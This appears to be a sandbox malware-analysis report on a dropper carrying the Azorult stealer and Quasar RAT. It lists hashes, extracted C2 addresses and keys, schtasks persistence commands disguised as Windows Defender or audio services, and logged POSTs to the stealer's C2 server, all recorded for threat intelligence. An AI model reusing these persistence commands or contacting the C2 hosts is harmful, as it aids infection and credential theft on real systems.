Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
06/03/2025, 02:28 UTC
General
-
Target
d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
-
Size
2.0MB
-
MD5
3122ecf57731e501138565db5741fe49
-
SHA1
5a41892c9e73afde78510c0426da994d21515e9e
-
SHA256
d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e
-
SHA512
d49434de0cbb63f44bba3e6e57bf7471bc2ce71b6efa81c1bacbf3bcf8e6c4138526c06760cb461b46ccb0b44f2d9e2422bd37352c1f60a952dfbaa6a8be8513
-
SSDEEP
24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYY:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://0x21.in:8000/_az/
Extracted
Family
quasar
Version
1.3.0.0
Botnet
EbayProfiles
C2
5.8.88.191:443
sockartek.icu:443
Mutex
QSR_MUTEX_0kBRNrRz5TDLEQouI0
Attributes
-
encryption_key
MWhG6wsClMX8aJM2CVXT
-
install_name
winsock.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
win defender run
-
subdirectory
SubDir
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 6 IoCs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 16 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of WriteProcessMemory 50 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k3⤵
- Maps connected drives based on registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3dQUaooQcsag.bat" "4⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 14924⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {542D3AE6-ECCC-4758-836E-5295C4C6056A} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\btpanui\SystemPropertiesPerformance.exeC:\Users\Admin\btpanui\SystemPropertiesPerformance.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"3⤵
-
-
C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F3⤵
- Scheduled Task/Job: Scheduled Task
-
-
Network
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105 -
POSThttp://0x21.in:8000/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 97
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Mar 2025 02:28:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228110|1741228110|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 97
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Mar 2025 02:28:31 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=557d8d2c1a452ee94ee5179c33b30844|212.102.63.147|1741228111|1741228111|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
-
DNSfreegeoip.netRemote address:8.8.8.8:53Requestfreegeoip.netIN AResponsefreegeoip.netIN A3.33.130.190freegeoip.netIN A15.197.148.33
-
GEThttp://freegeoip.net/xml/Remote address:3.33.130.190:80RequestGET /xml/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: freegeoip.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
content-type: text/html
date: Thu, 06 Mar 2025 02:28:43 GMT
content-length: 114
-
DNSapi.ipify.orgRemote address:8.8.8.8:53Requestapi.ipify.orgIN AResponseapi.ipify.orgIN A104.26.12.205api.ipify.orgIN A104.26.13.205api.ipify.orgIN A172.67.74.152
-
GEThttp://api.ipify.org/Remote address:104.26.12.205:80RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: api.ipify.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:28:43 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 91be6bda89d07755-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=39032&min_rtt=39032&rtt_var=19516&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=142&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
-
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
-
GEThttp://freegeoip.net/xml/Remote address:3.33.130.190:80RequestGET /xml/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: freegeoip.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
content-type: text/html
date: Thu, 06 Mar 2025 02:28:56 GMT
content-length: 114
-
GEThttp://api.ipify.org/Remote address:104.26.12.205:80RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: api.ipify.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:28:56 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 91be6c2d7d373695-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=34173&min_rtt=34173&rtt_var=17086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=142&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in:8000/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 97
Cache-Control: no-cache
Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228110|1741228110|0|1|0; snkz=212.102.63.147
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Mar 2025 02:29:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228145|1741228110|17|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 97
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 06 Mar 2025 02:29:06 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=eb93f7a51db95eed89133dbe09bccd01|212.102.63.147|1741228146|1741228146|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
DNSsockartek.icuRemote address:8.8.8.8:53Requestsockartek.icuIN AResponse
-
5.8.88.191:8080 -
44.221.84.105:8000http://0x21.in:8000/_az/http
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
44.221.84.105:8000http://0x21.in/_az/http
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/ -
3.33.130.190:80http://freegeoip.net/xml/http
HTTP Request
GET http://freegeoip.net/xml/HTTP Response
200 -
104.26.12.205:80http://api.ipify.org/http
HTTP Request
GET http://api.ipify.org/HTTP Response
200 -
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/ -
3.33.130.190:80http://freegeoip.net/xml/http
HTTP Request
GET http://freegeoip.net/xml/HTTP Response
200 -
5.8.88.191:8080
-
104.26.12.205:80http://api.ipify.org/http
HTTP Request
GET http://api.ipify.org/HTTP Response
200 -
5.8.88.191:443
-
5.8.88.191:8080
-
44.221.84.105:8000http://0x21.in:8000/_az/http
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
44.221.84.105:8000http://0x21.in/_az/http
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:53ip-api.comdns
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
8.8.8.8:53freegeoip.netdns
DNS Request
freegeoip.net
DNS Response
3.33.130.19015.197.148.33
-
8.8.8.8:53api.ipify.orgdns
DNS Request
api.ipify.org
DNS Response
104.26.12.205104.26.13.205172.67.74.152
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:53sockartek.icudns
DNS Request
sockartek.icu
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
208B
MD57e3cfd68e73df269a38f23b3cb71fd6c
SHA12ae2b4a669e96c5042ce8b0ef4547968650ffeee
SHA25633ff14010fd28d876f19142c08d0b389812bb3387366fe5db5696afcb20890d8
SHA512e3d51e66d6fd5d64114b83ea78873880860275ba0fb15efca15d0abb8c53bdd09f71febae3a801b3d9b2788a16769fc07dce33481caae0af45180f8929b86dbe
-
Filesize
213B
MD59b8dc42f62fa34a9e12500c9dc7ed921
SHA19cadf33a3dc02d4f11e5d7742337d5f9d26fd4b9
SHA256fc27dbb9b662c69b120cdd0747ed8fe39fceb1d28b7e92dd27f3354663a9186a
SHA5129ba2bba9f64a4571b5796ee5271462e082b331e51c860890b929a6ea10cab73e2003c87fd1b0c71fa8595bfe45c6e38010739d1fa6c7118b3c4627b0e132e355
-
Filesize
2.0MB
MD5671ca71c4f30eadb0e504e017979478a
SHA11ce79f9e434739f8605f58b6c2559f3c2f973586
SHA256797eb576c2e91590e0363d6a203c6d949711cba98ff7cd4878a6c101d209b401
SHA512826aac05471f9cf6fa35ffba7a3fcafe33c682a548c7c47d2df87ebf746b397f16f8dc85f5433a0bd40a9397d7b13307db0b7a88809581cb403146f9fc28a12a
-
Filesize
405KB
MD5b8ba87ee4c3fc085a2fed0d839aadce1
SHA1b3a2e3256406330e8b1779199bb2b9865122d766
SHA2564e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
SHA5127a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
-
Filesize
349KB
MD5b4a202e03d4135484d0e730173abcc72
SHA101b30014545ea526c15a60931d676f9392ea0c70
SHA2567050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
SHA512632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
624KB
-
Filesize
624KB
-
Filesize
376KB
-
Filesize
376KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
624KB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
376KB
-
Filesize
376KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
376KB
-
Filesize
376KB